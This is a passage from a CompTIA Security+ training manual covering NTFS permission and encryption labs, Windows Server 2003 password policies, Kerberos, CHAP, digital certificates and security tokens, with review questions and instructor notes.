          4 Within the Integrity folder, create
            a new folder called User1Folder

          5 Within User1Folder, create a new
            text document

          6 Type This document has not            In the new text document.
             been modified accidentally
             or intentionally.

          7 Save the file as
             New Text Document

          8 Close the document

          9 Log off User1

         10 Log on as User2

         11 Navigate to
            e:\Integrity\User1Folder

         12 From the New Text Document,           You did change the default permissions to
            remove the word not                   e:\Integrity\User1Folder, so you can still view
                                                  the contents of the file as User2.

         13 Try to save the file to save the      You receive an error message that you can't save
            changes                               the file. The data integrity of the file is
                                                  maintained.

         14 Close all windows and log off
            User2
1–22           CompTIA Security+ Certification

                              Data encryption
Explanation                   With NTFS, you are not limited to folder- and file-level security. Another function of
                              NTFS is the ability to encrypt data. Encryption is the process of taking readable data
                              and making it unreadable. Encryption is commonly used for remote data transfer, but it
                              can also be used for local security. Laptop users might want to use NTFS to secure and
                              encrypt their data in the event the laptop is stolen. While this solution is not 100%
                              effective, it does make it more difficult to hack into your system. Windows Server 2003
                              offers a very easy way to encrypt files on an NTFS partition.

Do it!                        D-5:    Encrypting data
                               Here’s how                               Here’s why

     This activity
                                1 Log on to the Windows Server
demonstrates how to               2003 server as User2
encrypt data within a file.
                                2 In My Computer, open the E:
                                  drive

                                3 Create a new folder called
                                  Encryption

                                4 Within the Encryption folder,
                                  create a new folder called
                                  User2Folder

                                5 Within User2Folder, create a new
                                  text document

                                   Edit the content to read
                                   This document is for my
                                   eyes only.

                                6 Save the document as
                                   Private Document

                                   Close the document

                                7 Right-click the document

                                   Choose Properties
                                                     Security overview       1–23

 8 Click Advanced




   Check Encrypt contents to
   secure data

   Click OK

 9 Click OK a second time




10 Select the Encrypt the file
   only radio button

   Click OK

11 Log off as User2

12 Log on as User1

13 Try to access the Private     Access should be denied. You'll also notice the
   Document file in              file name displays in green to indicate it's been
   e:\Encryption\User2Folder     encrypted.

14 Logoff User 1
1–24      CompTIA Security+ Certification


Unit summary: Security overview
Topic A              In this topic we discussed the importance of network security. You learned that
                     network security is the process by which digital information assets are protected. You
                     also learned the goals of network security: integrity, confidentiality, and availability. You
                     learned that confidentiality is the protection of data from unauthorized disclosure to a
                     third party, availability is the continuous operation of computing systems, and integrity
                     is the assurance that data has not been altered or destroyed.
Topic B              In this topic, you learned about the types of threats and their ramifications. You learned
                     there are four primary causes for network security breaches: technology weaknesses,
                     configuration weaknesses, policy weaknesses, and human error or malice.
Topic C              In this topic, you learned about the goals of network security. You learned the most
                     important goal of network security is to achieve the state where any action that is not
                     expressly permitted is prohibited. You also learned how to create a secure network
                     strategy. You learned that the goal in developing a security policy is to define the
                     organization’s expectations for computer and network use.
Topic D              In this topic, you learned about the three methods of access control: MAC, DAC and
                     RBAC. You implemented network security on an NTFS system and learned how to
                     ensure data confidentiality, availability and integrity. You also learned how to
                     encrypt data.

                     Review questions
                       1 What file systems are compatible with Windows NT 4.0?
                         A   FAT
                         B FAT32
                         C OSPF
                         D   NTFS
                       2 Which of the following commands will convert a FAT partition to NTFS?
                         A update C: /FS:NTFS
                         B upgrade C: /FS:NTFS
                         C   convert C: /FS:NTFS

                         D convert C: /NTFS
                                                              Security overview   1–25

3 Which of the following is the best definition of “data confidentiality”?
  A Data that has not been tampered with intentionally or accidentally
  B Data that has been scrambled for remote transmission
  C   Data that is secured so only the intended people have access

  D Data that can be accessed when it is needed
4 Which of the following is the best definition of “data availability”?
  A Data that has not been tampered with intentionally or accidentally
  B Data that has been scrambled for remote transmission
  C Data that is secured so only the intended people have access
  D   Data that can be accessed when it is needed
5 How can data confidentiality affect data availability?
  A They are two independent areas and do not affect each other
  B For data to be available, it cannot be confidential
  C   Data that is secured too strongly might conflict with the availability
  D Data that is secured too weakly might conflict with the availability
6 Which of the following is the best definition of “data integrity”?
  A   Data that has not been tampered with intentionally or accidentally
  B Data that has been scrambled for remote transmission
  C Data that is secured so only the intended people have access
  D Data that can be accessed when it is needed
7 Which of the following can damage data integrity? (Choose all that apply.)
  A   Viruses

  B   Worms

  C   Hackers

  D   Trojan Horses
1–26   CompTIA Security+ Certification

                    8 Data Integrity can also be threatened by environmental hazards such as dust, surges,
                      and excessive heat. True or false?
                      True

                    9 Which of the following is the best definition of “encryption”?
                      A Data that has not been tampered with intentionally or accidentally
                      B   Data that has been scrambled for remote transmission

                      C Data that is secured so only the intended people have access
                      D Data that can be accessed when it is needed
                                                             2–1


Unit 2
Authentication
                 Unit time: 120 minutes

                 Complete this unit, and you’ll know how to:

                 A Create strong passwords and store them
                    securely.

                 B Discuss the Kerberos authentication
                    process.

                 C Explain how CHAP works.

                 D Explain how digital certificates are created
                    and why they are used.

                 E Discuss what tokens are and how they
                    function.

                 F Explain the biometric authentication
                    processes.
2–2       CompTIA Security+ Certification


Topic A: Introduction to authentication
                     This topic covers the following CompTIA Security+ exam objectives:

                      #      Objective

                      1.2    Recognize and be able to differentiate and explain the following methods of authentication
                              • Username/Password

                      1.3    Identify non-essential services and protocols and know what actions to take to reduce the risks of
                             those services and protocols




                     Authentication
Explanation          Security of system resources generally follows a three-step process of authentication,
                     authorization, and accounting (AAA). This AAA model begins with positive
                     identification of the person or system seeking access to secured information or services
                     (authentication). That person is granted a predetermined level of access to the resources
                     (authorization), and the use of each asset is then logged (accounting). The most critical
                     step in the process is authentication. Without a positive identification, other steps are
                     worthless, because they cannot distinguish between the authorized user and an imposter.
                     The amount of security implemented in the authentication process should be
                     proportional to the value of the resources being protected. As our dependence on
                     computer network systems has increased, so has our willingness to pay for stronger
                     authentication technologies to secure against attack.

                     Usernames and passwords
                     Secret passwords have been used for millennia to gain access to otherwise forbidden
                     places. They have been as simple as “open sesame” and as demanding as the exact
                     words to a very long poem. In today’s computing environment, they are the prevailing
                     means of authentication.

                     Usernames
                     A username is a unique identifier that we use to identify ourselves to a computer or
                     network system when we log on. It is usually constructed of easily remembered
                     characters. The username and password together allow for a user’s authentication. The
                     username should be treated as an equal part of the authentication key and held in similar
                     confidence to the password. Not keeping your username secret can provide a potential
                     hacker with half the information needed to masquerade as you obtain the use of all your
                     system rights and privileges.

                     Passwords
                     A password is a secret combination of key strokes that, when combined with your
                     username, authenticates you to the computer or network system. In terms of
                     authentication, it is something that we know, rather than something we own or a part of
                     who we are, such as key card or a fingerprint. We are required to use many different
                     passwords, so we tend to prefer short, easy-to-remember passwords because longer
                     passwords take too long to type, and more complex passwords are more difficult to
                     remember.
                                                                                          Authentication      2–3

                         With increasing numbers of sites requiring authorization, users often choose to reuse the
                         same simplistic password on multiple sites, aggravating the vulnerabilities of the
                         authentication keys of which such passwords are a part.

                         Password protection guidelines
                         The proliferation of computing has led to the use of weak personal password techniques.
                         These weak techniques are the crux of the problem with passwords. We are now
                         operating in a digital environment in which the bad guys are using faster and more
                         capable computers and applications to violate our computer systems, because of this, we
                         need to more carefully construct, use, and store our passwords.
                         There are many different password conventions, but, there are five basic rules to follow
                         in order to safeguard your passwords:
                             • Passwords must be memorized. If they must be written down, the written records
                               must be locked up.
                             • For multiple applications, each password you choose must be different from any
                               other you use.
Some operating               • Passwords must be at least six characters long, and preferably longer, depending
systems such as                on the size of the character set used.
NetWare do not
recognize the                • Passwords must contain a mixture of letters (both uppercase and lowercase) if
difference between             the operating system supports case-sensitive passwords, numbers, and other
upper and lower case           characters, such as %, !, or &.
letters.
                             • Passwords must be changed periodically.

                         Strong password creation techniques
                         It is important to choose passwords that are easy to remember but difficult to recognize.
                         One way to do this is to think of a simple phrase or words to a song that can be easily
Have each student        remembered, such as, “April showers bring Might flowers.” Use the first letters of each
devise a strong
password and write it
                         word and add a number and a punctuation mark or another character, which might give
down on a piece of       you“Asb4Mf?”
paper along with their
name. Collect the
                         Another technique is to combine two dissimilar words and place a number between
papers and after         them, such as “SleigH9ShoE.” One can also substitute numbers for letters, but this
several more minutes     should be done carefully. Replacing the words “to” and “for” with their numeric
of discussion, have      synonyms, “2” and “4” is a fairly obvious ploy to most hackers. An all too frequent
each student recall      example of this simple substitution process is “pa55w0rd.” A five is just a reformatted
their password. You be
the judge as to          “S,” and zero could easily be the letter “O.”
whether the password
                         Most password cracking utilities check for these types of well-known substitutions. The
qualifies as strong.
                         key is that your password means something to you and that it creates a strong password,
                         one that cannot be easily guessed or quickly discovered using a brute force attack (the
                         process of systematically trying every single possible combination of characters until
                         the correct combination is determined).

                         Techniques to use multiple passwords
                         People often have access to many different systems, each requiring a
                         username/password set. It is recommended that you use a different password every time
                         one is required, but you can also group different Web sites or applications by their
                         appropriate level of security and use a different password for each of those groups while
                         taking care to actually use a different password for each of the more critical Web sites
                         (for example., those of financial institutions) and applications (for example, financial
                         software).
2–4   CompTIA Security+ Certification

                 For example, one lower-level group might make up the various news and weather-
                 related Web sites you visit. If someone were to obtain your password to these sites, it
                 would do you no real harm.
                 Another method is to cycle your more complex passwords down the groups, from most
                 sensitive to least. This allows you to reduce the total number of passwords that you are
                 using while giving you time to work with a given password (and remember it) before
                 relegating it for use in the more insecure password entry fields that you might
                 encounter. You might also try using a common password base, but change parts of the
                 password depending on where you are required to use it. For example, you could take
                 the password “ToRn71@L” (sort of like “torrential”) and depending on the Web site
                 change the “T,” “R,” and “L” to “NoYn71@T” for the New York Times Web site and
                 “SoAn71@N” for the SANS Institute Web site.

                 Storing passwords
                 If you must write a list of your various passwords down on paper, keep the piece of
                 paper close to you in an item that you are not likely to lose sight of, such as a purse or
                 wallet. These passwords should be written in very small type to minimize someone else
                 reading the information.
                 Another good practice is to develop a personal code to apply to your password list. For
                 instance, the first three characters of each password might be transposed and moved to
                 the end of the password string, and the hostname might be moved down one place in the
                 list, lining it up with a password for a different server. The individual who owns this
                 written password card would have no problem quickly decoding the information to
                 enter, but it adds a small delay for anyone who would maliciously use the information.
                 If you keep this list electronically, encrypt the password list with Windows 2000/Server
                 2003/XP encryption or some application that is specifically designed for this purpose.
                 Password protect the encrypted file with a strong password (different from your login
                 password) and never electronically store the password that gains access to the file.

                 The RunAs service
                 RunAs allows an administrator to log on with a standard user account and still run
                 administrative programs with administrative rights. Those rights are only applied to the
                 application, so viruses, worms, and Trojan Horses cannot access the network with
                 administrative privileges.
                 To activate RunAs, press Shift and then right-click an application, shortcut or service.
                 Provide the appropriate administrator credentials and click OK. This way, you can, for
                 example, check e-mail and perform necessary management tasks without actually being
                 logged on as administrator. At the same time, having RunAs available makes it possible
                 for regular users to access the network with administrative privileges should they know
                 the logon credentials of an administrative user. To prevent users from using the RunAs
                 service, you can disable it. Notice that you shouldn't use RunAs to run certain
                 applications, such as word processing applications.

                 Setting login policies in Windows Server 2003
                 Windows Server 2003 provides several safeguards to discourage hackers from attacking
                 your network. These include the following:
                     • Removing the name of the last user to logon to the system. Without an account
                       name, the hacker will have an extra step to complete before gaining access to the
                       system.
                                                                           Authentication      2–5

             • Specifying a minimum length for passwords. Short passwords or blank
               passwords are easy to crack.
             • Setting the password complexity to require use of at least three of the following:
               one number, one uppercase letter, one lowercase letter, or one symbol.
               Combining password length with complexity is a recommended method of
               security professionals.
             • Implementing an account lockout policy. The account lockout policy will
               disable an account for a specific amount of time after a certain number of failed
               logon attempts.
         To prevent display of the last logon name in Windows Server 2003, modify the local
         security policy and change the “Interactive logon: Do not display last user name” option
         to Enabled.

Do it!   A-1:    Preventing the display of the last logon name
          Here’s how                                Here’s why
           1 Log on to the Windows Server
             2003 server as Administrator

           2 Click Start

              Choose Administrative                 The Local Security Settings window appears.
              Tools, Local Security Policy

           3 Expand Local Policies




           4 Select Security Options

           5 Double-click Interactive
              logon: Do not display last
              user name

           6 Select Enabled

              Click OK

           7 Close all windows and log off

           8 Press c + a + d                        Notice the User name field is empty in the logon
                                                    screen.
2–6           CompTIA Security+ Certification

                             Minimum password lengths
Explanation                  To specify a minimum length for passwords in Windows Server 2003, modify the local
                             security policy and change the “Minimum password length” option.

Do it!                       A-2:    Using the Windows Server 2003 local password
                                     policy settings for length
                              Here’s how                             Here’s why
                               1 Log on to the Windows Server
                                 2003 server as Administrator

                               2 Click Start

                                 Choose Administrative               To access the Local Security Settings window.
                                 Tools, Local Security
                                 Policy

                               3 Expand Account Policies

                               4 Select Password Policy              To start the process of changing the default
                                                                     password policy.

                               5 Double-click Minimum
                                 password length

                                 Change the characters value to 9

                               6 Click OK

                               7 Close all windows and log off

                               8 Log on as User1                     The user does not yet require a password to log
                                                                     on.

                               9 Press c + a + d

Tell students this step is    10 Click Change Password…
not meant to be
successful.
                                 In both the New Password and Confirm New Password text boxes, type a new
                                 password of less than 9 characters

                                 Click OK                            A message stating your password must be at
                                                                     least 9 characters long cannot repeat any of your
                                                                     previous 0 passwords and must be at least 0 days
                                                                     old appears.

                              11 Assign password1 as the new         To change the password.
                                 password

                              12 Click OK

                              13 Log off
                                                                                      Authentication       2–7

                    Password complexity
Explanation         Finally, to set the password complexity in Windows Server 2003, modify the local
                    security policy and change the “Passwords must meet complexity requirements” option.

Do it!              A-3:    Using the Windows Server 2003 local password
                            policy settings for complexity
                     Here’s how                                Here’s why
                      1 Log on to the Windows Server
                        2003 server as Administrator

                      2 Click Start

                         Choose Administrative                 To access the Local Security Settings window.
                         Tools, Local Security
                         Policy

                      3 Expand Account Policies                (If necessary.)

                      4 Select Password Policy                 (If necessary.)

                      5 Double-click Password must meet
                        complexity requirements

                         Select Enabled

                      6 Click OK

                      7 Close all windows and log off

                      8 Log on as User1

                      9 Press c + a + d

                     10 Click Change Password…

                         In the Old Password box, type password1

                         In the New Password box and Confirm New Password box, type password321

Review the entire    11 Click OK                               A message box appears, indicating restrictions
message with your                                              and steps for completing the password change.
students.
                     12 Assign Password1 as the new            The password change is successful. Changing
                        password                               the p in password to a capital P caused the
                                                               password to meet the password complexity
                                                               requirements.

                     13 Log off User1
2–8           CompTIA Security+ Certification


Topic B: Kerberos
                           This topic covers the following CompTIA Security+ exam objective:

                            #       Objective

                            1.2     Recognize and be able to differentiate and explain the following methods of authentication
                                     • Kerberos
                                     • Mutual




                           Introducing Kerberos
Explanation                In 1983, researchers at the Massachusetts Institute of Technology (MIT) started a five-
                           year project to incorporate computers into the MIT curriculum. As part of the project, a
                           leading edge network authentication protocol was developed. It was named Kerberos,
                           after the three-headed dog that guarded the entrance to Hades in Greek mythology.
 Point out that Kerberos   In 1989, version 4 was publicly released in open source code. Although Kerberos 4 is
 5 is the current          still in use in a few environments, Kerberos 5 is the standard today. As of this writing,
 standard today. Point
 to the Web site where     the latest version is Kerberos 5-1.4.2. Kerberos is freely available to anyone in the U.S.
 Kerberos security is      and Canada from the following Web page:
 freely available.
                                  itinfo.mit.edu/product.php?name=Kerberos
                           Kerberos provides a means to authenticate users and services over an open multi-
                           platform network using a single login procedure. After the user is authenticated by the
                           system, all subsequent commands and transactions can be carried out securely without
                           any prompting for a password.
                                                                  Authentication      2–9

Terminology
The Kerberos system consists of the following components:
   • Principal — Any uniquely-named client or server to which Kerberos can assign
     tickets.
    • Authentication Server (AS) — A network service that authenticates users or
      services, then supplies ticket-granting tickets to the authorized user or service.
    • Ticket-Granting Server (TGS) — A network service that supplies temporary
      session keys and tickets to authorized users or services.
    • Key Distribution Center (KDC) — A server running both AS and TGS services:
      services both initial ticket and ticket-granting ticket requests.
    • Realm — An organizational boundary that is formed to provide authentication
      boundaries. Each realm has an Authentication Server and a Ticket-Granting
      Server.
    • Remote Ticket-Granting Server (RTGS) — A remote realm’s TGS.
The following terms describe types of data that are passed over the network during
Kerberos processing:
    • Credentials — A ticket for the resource server plus a temporary encryption key
      (session key).
    • Session key — A temporary encryption key used between the client and
      resource server, with a lifetime limited to the duration of a single login session.
    • Authenticator — A record containing information that can be shown to have
      been recently generated using the session key known only by the client and
      server. The authenticator is typically valid for five minutes and cannot be reused.
    • Ticket — A record that helps a client authenticate itself to a server; it contains
      the client’s identity, a session key, a timestamp, and checksum, all sealed using
      the resource server’s secret key.
    • Ticket-Granting Ticket (TGT) — A ticket that is granted as part of the Kerberos
      authentication process and used to obtain other tickets from the TGS.
2–10   CompTIA Security+ Certification

                  How it works
                  Kerberos uses encryption technologies to pass a user’s credentials over unsecured
                  channels and validate the user for network resources. The process, pictured in Exhibit 2-
                  1, is as follows:
                       1 When Maria logs on to her workstation with her username and password, the
                           workstation automatically sends a request to the Authenticating Server (AS) for
                           a Ticket-Granting Ticket (TGT). The AS has a database listing the valid users
                           and servers within the scope of its authority (realm) and their master keys.
                       2 The AS receives the request for a TGT, authenticates Maria, uses her master key
                           to encrypt a new TGT, and sends it back to Maria’s workstation. Now that she
                           has a TGT, she does not have to keep authenticating herself to gain access to
                           additional services, at least until the TGT expires. (The TGT is valid for the
                           duration of the logon session, as configured in the account security policy, or
                           until the user disconnects or logs off.)
                       3 Whenever Maria needs a new service, her workstation sends a copy of the TGT,
                           along with the name of the server that holds the application she needs, an
                           authenticator, and the time period that she needs access to each service, to the ticket-
                           granting server (TGS) requesting a ticket for each of the services she needs.
                       4 Once the TGS has verified that Maria is in fact who she says she is, using the
                           session key to access her authenticator, and assuming the TGT matches her to
                           her authenticator, the TGS sends her tickets to use the services she needs.
                       5 After receiving the appropriate tickets from the TGS, Maria’s workstation
                           verifies that each one is for a service that she originally requested, and sends a
                           ticket to each relevant server requesting permission to use their services.
                       6 Each of the servers that receive a request for service verifies that the request
                           came from the same person, or machine, to which the TGS granted the ticket. As
                           each server determines that Maria has the authority to use the service requested
                           it authorizes her to begin using those services.
                  The TGT must be submitted each time Maria needs additional services. Each time the
                  validity period for using previously requested service expires, an entirely new TGT
                  must be obtained.




                    Authenticating Server

                           1    2


                                            3
                                            4


                           Client               Ticket-Granting Server

                           5    6




                      Resource Server


                  Exhibit 2-1: Kerberos authentication process
                                                                    Authentication     2–11

Using Kerberos in very large network systems
Previously, we discussed the process by which Kerberos uses an AS, TGT, and a TGS
to streamline the authentication process. This is useful in environments that have many
users and services on the network; however, in the case of very large organizations, the
computer network can encompass many different organizational boundaries, whether
they are geographical or functional, and serve thousands of users. In such a system, it
would not make sense for each user to go through a single AS and TGS.
In very large organizations, Kerberos employs multiple authentication servers, each of
which is responsible for a subset of users and servers in the network system. Each of
these subsets has its own AS and TGS and is called a realm. Cross-realm authentication
must occur in order for a client to use a service that is running in a realm other than its
own. Kerberos uses a hierarchical organization to accomplish this, much as a network
administrator uses hierarchical IP addresses to identify subnetworks within a large
system. The process for cross-realm authentication is as follows:
    1 The client contacts its local TGS, requesting permission to access a service in a
        remote realm.
    2 The TGS returns a remote TGT. The token does not provide access to any
        specific remote TGS or service; it simply informs other TGSs that the user has
        been authenticated.
    3 The client presents the remote TGT to the remote TGS requesting access to a
        service within its realm.
    4 The RTGS checks the user’s credentials and establishes a session key. It returns
        the session key to the client.
    5 The client submits the session key to the RTGS to use its services.
    6 The remote resource server checks the user’s credentials and allows access to the
        service.




 Authenticating Server

        1    2


                         3
                         4


        Client               RTGS

        5    6




  Cross-Realm Server


Exhibit 2-2: Cross-realm authentication

For more information about Kerberos, including initial, preauthentication, invalid, renewable,
postdated, proxiable, and forwardable tickets, see RFC 1510. RFC’s can be found at the
following Web page:
    http://www.faqs.org/rfcs/rfc-index.html
2–12   CompTIA Security+ Certification

                  Security weaknesses of Kerberos
                  Kerberos does a good job of authenticating an individual user’s right to access a
                  network resource, however, Kerberos does have the following vulnerabilities:
                      • Password-guessing attacks are not solved by Kerberos. An attacker can use a
                        dictionary attack to decrypt a key if a user chooses a weak password.
                      • Kerberos assumes that workstations, servers, and other devices that are
                        connected to the network are physically secure, and that there is no way for an
                        attacker to gain access to a password by establishing a position between the user
                        and the service being sought.
                      • You must keep your password secret. If you share your password with
                        untrustworthy individuals, or send the password in plain text e-mail, or write
                        your password on the bottom of your keyboard, then an attacker can easily gain
                        access to services that are supposed to be available only to you.
                      • Denial-of-service attacks are not prevented by Kerberos.
                      • The internal clocks of authenticating devices on a network must be “loosely
                        synchronized” in order for authentication to properly take place.
                      • The authentication server (AS), and any other server that maintains a cache of
                        master keys, must be secure. If an attacker gains access to the AS then he or she
                        can impersonate any authorized user on the network.
                      • Authenticating device identifiers must not be recycled on a short-term basis. For
                        example, a particular user is no longer a part of the network, but is not removed
                        from the access control list (a manually configured list that limits access to
                        network resources to authorized users only). If that user’s principal identifier is
                        given to another user, then the new user has access to the same network services
                        as the original user.

                  Mutual authentication
                  Mutual authentication is the process by which each party in an electronic
                  communication verifies the identity of the other. For instance, a bank clearly has an
                  interest in positively identifying an account holder prior to allowing a transfer of funds;
                  however, you as a bank customer also have a financial interest in knowing your
                  communication is with the bank’s server prior to providing your personal information.
                  Kerberos allows a service to authenticate a recipient so that access to the service is
                  protected. Conversely, it allows the recipient to authenticate the service provider so
                  rogue services are blocked.
                                                                          Authentication      2–13

Do it!   B-1:   Discussing Kerberos
          Questions and answers
          1 What are some vulnerabilities in Kerberos security?
            • Unsecured or weak passwords
            • Physically accessible workstations and servers
            • Vulnerable to denial-of-service attacks
            • Recycled SIDs

          2 A subset of users in a very large system employing Kerberos is called a:
            A      Peer
            B      Client
            C      Server
            D      Realm

          3 In very large organizations, Kerberos employs multiple authentication servers,
            each of which is responsible for a subset of users and servers in the network
            system. True or false?

            True

          4 Which of the following is/are not true in a Kerberized system?
            A      Once the user has been authenticated, the AS sends the user a ticket-granting
                   ticket (TGT).
            B      Once the client has received a TGT, the client presents it to the TGS in order
                   to receive a session key for each requested service.
            C      Once the client receives the appropriate ticket from the TGS, the client
                   submits a request to the authentication server.

          5 How long is a timestamp valid in a Kerberos authenticator?
            A      Eight hours
            B      One hour
            C      Twenty minutes
            D      Five minutes
            E      Two minutes
2–14          CompTIA Security+ Certification


Topic C: Challenge Handshake Authentication
         Protocol
                         This topic covers the following CompTIA Security+ exam objective:

                          #      Objective

                          1.2    Recognize and be able to differentiate and explain the following methods of authentication
                                  • CHAP




                         Introducing CHAP
Explanation              The Challenge Handshake Authentication Protocol (CHAP) is an authentication scheme
                         used by Point-to-Point Protocol (PPP) servers to validate the identity of the remote
                         client at the beginning of the communication session or any time throughout the session.

                         The CHAP challenge-and-response sequence
                         After a link is established between the peer and authenticating server, CHAP applies a
                         three-way handshake procedure as follows:
                             1 The authenticating server sends a challenge message to the peer.
                             2 The peer responds with a value that has been calculated using a one-way hash
                                 function (an algorithmic function that takes an input message of arbitrary length
                                 and returns an output of fixed length).
                             3 The authenticating server receives the response and checks it against its own
                                 calculation of the expected hash value. The authenticating server must respond
                                 to the peer with either a “success” or a “failure” message. The connection is
                                 terminated if the values do not match.
                             4 The authenticator sends a new challenge to the peer at random intervals
                                 throughout the session to make sure it is still communicating with the same peer.



                                                       1. Challenge message

                                                          2. Response hash


                                                        3. Success or failure




                           Authenticating Server                                                 Peer

                         Exhibit 2-3: CHAP challenge-and-response process
                                                                          Authentication       2–15

         CHAP protects against playback attacks by changing the content of the challenge
         message with each authentication request. The challenge can be repeated at
         unpredictable intervals while the connection is open, limiting the time of exposure to
         any single attack, and the server is in control of the frequency and timing of the
         challenges.
         For further information on CHAP, see the following Web page:
             http://www.ietf.org/rfc/rfc1994.txt

Do it!   C-1:    Reviewing the Kerberos handshake
          Questions and answers
           1 Put the following steps in the proper sequence.

              ___ The authenticator sends a new challenge to the peer at random            5
              intervals throughout the session to make sure that it is still
              communicating with the same peer.

              ___ The peer responds with a hash value.                                     2

              ___ The authenticating server sends a challenge message to the peer.         1

              ___ The authenticating server checks the response against its own            3
              calculation of the expected hash value.

              ___ The authenticating server responds with either a “success” or a          4
              “failure” message.

           2 CHAP protects against ___________ attacks by changing the content of the
             challenge message with each authentication request.

              playback
2–16      CompTIA Security+ Certification


Topic D: Digital certificates
                     This topic covers the following CompTIA Security+ exam objectives:

                      #        Objective

                      1.2      Recognize and be able to differentiate and explain the following methods of authentication
                                • Certificates

                      4.1      Be able to identify and explain the of the following different kinds of cryptographic algorithms
                                • Symmetric
                                • Asymmetric

                      4.3      Understand and be able to explain the following concepts of PKI (Public Key Infrastructure)
                                • Certificates




                     Introducing digital certificates
Explanation          Digital certificates are used to authenticate a person’s or an organization’s identity on
                     the Internet. They are used in a variety of transactions including e-mail, electronic
                     commerce, and the electronic transfer of funds. Digital certificates provide individuals
                     and organizations with a means of privately sharing information so each party is
                     confident that the individual or organization with which they are communicating is in
                     fact who it claims to be. In order to be sure this is true, it’s necessary to involve a third,
                     trusted party to legitimize, or pre-qualify, individuals and organizations.

                     Electronic encryption and decryption concepts
                     Before digital certificates are discussed in detail, it’s important to understand some basic
                     concepts about cryptography. In simple terms, encryption is the process of converting a
                     plain text message into a secret message; decryption reverses the process and converts a
                     secret message into a plain text message.
                     There are two basic types of ciphers (techniques that are used for encryption and
                     decryption), symmetric ciphers and asymmetric ciphers:
                            • Symmetric ciphers use the same key to both encrypt and decrypt a message.
                              Although symmetric encryption algorithms are computationally more efficient,
                              there is a risk that an unintended party could stage an attack if they intercepted
                              the key as it was passed between the sender and the receiver.
                            • Asymmetric ciphersrequire one key to be used to encrypt the message and a
                              different key to be used to decrypt it. The keys are different, but they act as a
                              pair. When you create the key pair, one of the keys is designated as the private
                              key, which is sometimes referred to as a secret key, and the other is designated
                              as the public key. As asymmetric ciphers require two different keys, they are
                              typically more secure, if more complex, than symmetric ciphers.
                     Private keys can be held by individuals or groups of individuals that are part of a
                     predefined group.
                                                                                              Authentication     2–17

                          Public key system
                          A message encrypted by one key in a key pair might be decrypted using the other. This
                          is part of what is called a public key system. You keep your private key private and you
                          share your public key with anyone you wish. This way the private key or the algorithm
                          upon which it is based is not compromised. This means that anyone can use the public
                          key to send an encrypted message, but only the private key holder(s) can decrypt it.
                          The following example of an encrypted communication between Alice and Bob
                          illustrates this concept.
                          Alice and Bob have never before communicated with each other. When Alice and Bob
                          want to communicate with each other, they can share their plaintext public keys with
                          each other over an insecure line. If Alice uses Bob’s public key to encrypt a message to
                          him, only Bob can decrypt it using his private key, and vice versa.
                          If, however, both Bob and Alice have published their public keys online, how does Bob
                          know it’s actually Alice who sent him the message, and not some other person who
                          accessed his public key claiming to be Alice? Alice’s identity can be verified if she
                          “notarizes” the message with a digital certificate issued by a certification authority.
                          A certification authority (CA) is a third-party entity that verifies the actual identity of an
                          organization or individual before it provides the organization or individual with a digital
                          certificate, much the same way that a state provides a business with a business license,
                          or a national government provides a citizen with a passport. A certificate is only issued
                          after careful verification of an individual’s or organization’s identity using the
                          appropriate documentation.
                          The digital certificate typically consists of the owner’s public key and name, the
                          expiration date of the public key (which is usually only valid for one year), the name of
                          the CA that issued the digital certificate, the serial number of the digital certificate, and
                          the digital signature of the CA.

                          How much trust should one place in a CA?
                          Referring back to our previous example, now that Bob has received a message from
                          Alice (signed with a digital certificate and authenticated by a certificate authority), does
                          this mean Bob can now trust that the sender was actually Alice and not an imposter? It
                          all depends on how much he trusts the CA. It is possible that the CA did not do its
                          homework and did not receive enough information from the person who applied for a
                          digital certificate using Alice’s name to guarantee that person actually was Alice.
                          Serving digital certificates is no longer a complex or expensive process. In fact,
                          Windows Server 2003 comes with a certificate server.
Assure students           Popular and usually more reputable CAs, such as VeriSign, have several levels of
certificates will be      authentication that they issue, based on the amount of data they collect from their
revisited several times
in different contexts     applicants. An applicant must usually show up in person to show the companies the
during the course, so     required documentation to be granted the highest level. Less proof is required to receive
they will have many       lower levels of authentication. This means that if a CA wants to succeed in the
opportunities to          marketplace they must be very careful when granting higher levels of authentication. It
understand this
concept.
                          also means that people need to check the digital certificates they receive from other
                          people and organizations to make sure that a reputable CA issued them.
                          Digital certificates are proving themselves very useful on the Internet because they
                          provide a safe and secure means of digital authentication.
2–18     CompTIA Security+ Certification

Do it!              D-1:      Discussing digital certificates
                      Questions and answers
                       1 Asymmetric ciphers require a public key to encrypt a message and a
                         ______________ to decrypt it.

                          private key

                       2 A trusted, third-party entity that verifies the actual identity of an organization or
                         individual before it provides a digital certificate is called a:
                          A      Cross-realm authentication
                          B      Digital signature
                          C      Certification authority

                       3 Symmetric ciphers use the same key to both encrypt and decrypt a message. True
                         or false?

                          True

                       4 Digital certificate consists of which of the following? (Choose all that apply.)
                          A      The certificate owner’s public key
                          B      The certificate owner’s signature
                          C      The certification authority’s signature
                          D      The expiration date of the public key

                       5 What is the purpose of the digital certificate?

                          To authenticate a person’s or organization’s identity on the Internet
                                                                                                     Authentication          2–19


Topic E: Security tokens
                         This topic covers the following CompTIA Security+ exam objective:

                          #     Objective

                          1.2   Recognize and be able to differentiate and explain the following methods of authentication
                                 • Tokens




                         Introducing security tokens
Explanation              A security token is an authentication device that has been assigned to a specific user by
                         an appropriate administrator. Security tokens come under the “something you have”
                         category of authentication.
                         Usually security tokens are small, credit card-sized physical devices you can carry
                         around, although there are some software-based security tokens that can reside on your
Introduce the concept    workstation. Most security tokens also incorporate two-factor authentication methods to
of “something you
have” versus
                         work effectively. That means you must possess both the correct password (something
“something you know”     you know) and the correct token (something you have) to gain access to the resources
as it applies to         you are seeking.
authentication. A
security token is like   There are two types of security tokens: passive and active. Although both possess a base
“having” an ATM card     key, the passive token simply acts as a storage device for the base key, and the active
that allows you to       token can provide variable outputs in various circumstances. One of the best qualities of
begin transactions at    either a passive or active token is that they can utilize base keys that are much stronger
automatic teller
machines. You must       than the relatively short and simple passwords that a person can remember.
also “know” the PIN in
                         Tokens provide you and the system in which you are operating with very strong
order to complete the
transaction.             authentication tools. The downside to tokens of course, like your car keys, is that if you
                         lose them, you cannot get into your computer system.

                         Passive tokens
                         Passive tokens simply act as storage devices for base keys. They share their keys by
                         various means: notches on the token match a receiving device, magnetic strips transmit
                         the key by using a card reader; optical bar codes are read by a scanner, and so on.
                         The most common passive tokens are plastic cards with magnetic strips embedded in
                         them. ATM cards, credit cards, card keys that open electronic door locks, and other
                         types of these keys are everywhere today. They are cheap to manufacture and read, and
                         are easy to carry, but unfortunately, they are also more easily copied than other types of
                         tokens. This is why many of these types of tokens require that a PIN be produced along
                         with the card. These PINs, like passwords typed into a computer, can be easily gained
